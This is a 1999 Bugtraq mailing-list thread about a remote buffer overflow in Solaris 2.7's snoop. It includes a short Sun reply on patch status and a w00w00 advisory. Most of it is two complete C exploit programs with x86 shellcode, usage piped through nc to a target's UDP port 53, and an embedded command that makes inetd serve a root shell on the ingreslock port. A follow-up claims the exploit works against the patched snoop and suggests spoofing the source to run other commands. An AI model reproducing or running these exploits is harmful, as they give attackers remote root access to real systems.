In case you don't know, both ISS and w00w00 have produced snoop advisories
written recently; this is Chok Poh (of Sun Microsystems)'s response to
Alfred Huger's request for clarification on what patches fix what.

---------- Forwarded message ----------
Date: Thu, 9 Dec 1999 14:57:10 -0800
From: Alfred Huger <ah@SECURITYFOCUS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Clarification needed on the snoop vuln(s) (fwd)

---------- Forwarded message ----------
Date: Thu, 9 Dec 1999 14:53:56 -0800 (PST)
From: Chok Poh <Chok.Poh@eng.sun.com>
To: ah@SECURITYFOCUS.COM
Subject: Clarification needed on the snoop vuln(s)

Alfred,

The patches that Sun has released were in relation to the buffer overflow
problem reported by ISS. We are producing patches for the problem posted
by w00w00.
Chok
__________________________________________________________________________

Chok Poh
Sun Security Coordination Team
Sun Microsystems, Inc.
email: security-alert@sun.com

__________________________________________________________________________



Date: Tue, 7 Dec 1999 04:42:06 +0300 (MSK)
From: Matt Conover <shok@cannabis.dataforce.net>
To: news@technotronic.com
cc: w00w00@blackops.org
Subject: [w00giving #8] Solaris 2.7's snoop
Message-ID: <Pine.LNX.3.95.991207044002.14801C-100000@cannabis.dataforce.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-news@technotronic.com
Precedence: bulk

[Note: as we promised, our website and technotronic will get this advisory
before anything else does.  Thanks for participating in technotronic.]

w00w00 Security Development (WSD)
http://www.w00w00.org/advisories.html

Discovered by: K2 (ktwo@ktwo.ca)

Snoop is a program similar to tcpdump that allows one to watch
network traffic.  There is a buffer overflow in the snoop program when run
in verbose (-v) mode that occurs when a domain name greater than 1024
bytes is logged, because it will overwrite a buffer in print_domain_name.
This vulnerability allows remote access to the system with the privileges
of the user who ran snoop (usually root, because it requires read
privileges on special devices).

---------------------------------------------------------------------------
Exploit (by cheez):

/* 
   Remote Solaris 2.7 x86 snoop exploit
   
   Run with ( ./snp ) | nc -u target_host_network 53
   requires target host to be running "snoop -v"
   
   Thanks str/horizon for shellcodes (hi plaguez)
*/

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shell[] =
"\xEB\x37\x5E\x8D\x5E\x10\x89\x1E\x83\xC3\x08\x89"
"\x5E\x04\x83\xC3\x03\x89\x5E\x08\x83\xEB\x0B\x8D"
"\x0E\x89\xCA\x33\xC0\x89\x46\x0C\x89\x46\xF5\x89"
"\x46\xFA\x88\x46\x17\x88\x46\x1A\xB0\x3B\x52\x51"
"\x53\x50\x9A\x73\x74\x72\x6E\x07\x72\xE8\xC4\xFF"
"\xFF\xFF\x31\x33\x20\x4A\x61\x6E\x20\x31\x39\x39"
"\x38\x2D\x2D\x73\x74\x72\x2F\x62\x69\x6E\x2F\x73"
"\x68\x28\x2D\x63\x29 echo w00w00;"
"echo \"ingreslock stream tcp nowait root /bin/sh sh -i\" >> /tmp/w00;"
"/usr/sbin/inetd -s /tmp/w00; /bin/rm -f /tmp/w00";

#define SIZE 2048
#define NOPDEF 349
#define DEFOFF 0

char buffer[SIZE];
const char x86_nop=0x90;
long nop=NOPDEF, esp=0x8047344, offset=DEFOFF;

int main (int argc, char *argv[]) 
{
    int i;

    if (argc > 1) offset += strtol(argv[1], NULL, 0);
    if (argc > 2) nop += strtoul(argv[2], NULL, 0);

    memset(buffer, x86_nop, SIZE);
    memcpy(buffer+nop, shell, strlen(shell));

    for (i = nop+strlen(shell); i < SIZE-4; i += 4)
        *((int *) &buffer[i]) = esp+offset;

    fprintf(stderr,"0x%x\n", esp+offset);
    printf("%s", buffer);

    return 0;
}
---------------------------------------------------------------------------

Patch:

Because Sun Microsystems doesn't include source, we must wait for them to
release a patch.
---------------------------------------------------------------------------

http://www.roses-labs.com, http://www.napster.com,
http://www.technotronic.com, http://www.w00w00.org


-----Original Message-----
From: Matt Conover <shok@camel.ethereal.net>
To: news@technotronic.com
Subject: Re: w00giving #8] Solaris 2.7's snoop 

w00w00 Security Development (WSD)
http://www.w00w00.org/advisories.html

Discovered by: K2 (ktwo@ktwo.ca)

Hi,
  Here's a new version of my snoop exploit, it seems that it will
work on the new patched version of snoop aswell, and actually, the target
host dose NOT have to be running with -v.  Some interesting applications
would be to spoof the source and have it issue a remote command other then
loading a portshell.


K2
w00w00


/*
   by: K2,
   version .2
   this is a funny Solaris.
   remote Solaris 2.7 x86 snoop exploit
   rm /tmp/w0 yourself!&@$*(&$!*(@*$&()%RW

   run with ( ./snp ) | nc -u target_host_network 53
   requires target host to be running "snoop"

   verified with patch 108483-01

   thx str/horizon for shellcodes.  Hi plageuz
   Hi mom.
*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>


char shell[] =
"\xEB\x37\x5E\x8D\x5E\x10\x89\x1E\x83\xC3\x08\x89"
"\x5E\x04\x83\xC3\x03\x89\x5E\x08\x83\xEB\x0B\x8D"
"\x0E\x89\xCA\x33\xC0\x89\x46\x0C\x89\x46\xF5\x89"
"\x46\xFA\x88\x46\x17\x88\x46\x1A\xB0\x3B\x52\x51"
"\x53\x50\x9A\x73\x74\x72\x6E\x07\x72\xE8\xC4\xFF"
"\xFF\xFF\x31\x33\x20\x4A\x61\x6E\x20\x31\x39\x39"
"\x38\x2D\x2D\x73\x74\x72\x2F\x62\x69\x6E\x2F\x73"
"\x68\x28\x2D\x63\x29 echo w00w00;echo \"ingreslock"
"stream tcp nowait root /bin/sh sh -i\" >>/tmp/w0;"
"/usr/sbin/inetd -s /tmp/w0;/bin/rm -f /tmp/w0";


#define SIZE 2048
#define NOPDEF 349
#define DEFOFF 0

const char x86_nop=0x90;
long nop=NOPDEF,esp=0x804646c;
long offset=DEFOFF;
char buffer[SIZE];

int main (int argc, char *argv[]) {
    int i;

    if (argc > 1) offset += strtol(argv[1], NULL, 0);
    if (argc > 2) nop += strtoul(argv[2], NULL, 0);

    memset(buffer, x86_nop, SIZE);
    memcpy(buffer+nop, shell, strlen(shell));
    for (i = nop+strlen(shell); i < SIZE-4; i += 4) {
        *((int *) &buffer[i]) = esp+offset;
    }

    fprintf(stderr,"0x%x\n",esp+offset);
    printf("%s", buffer);

    return 0;
}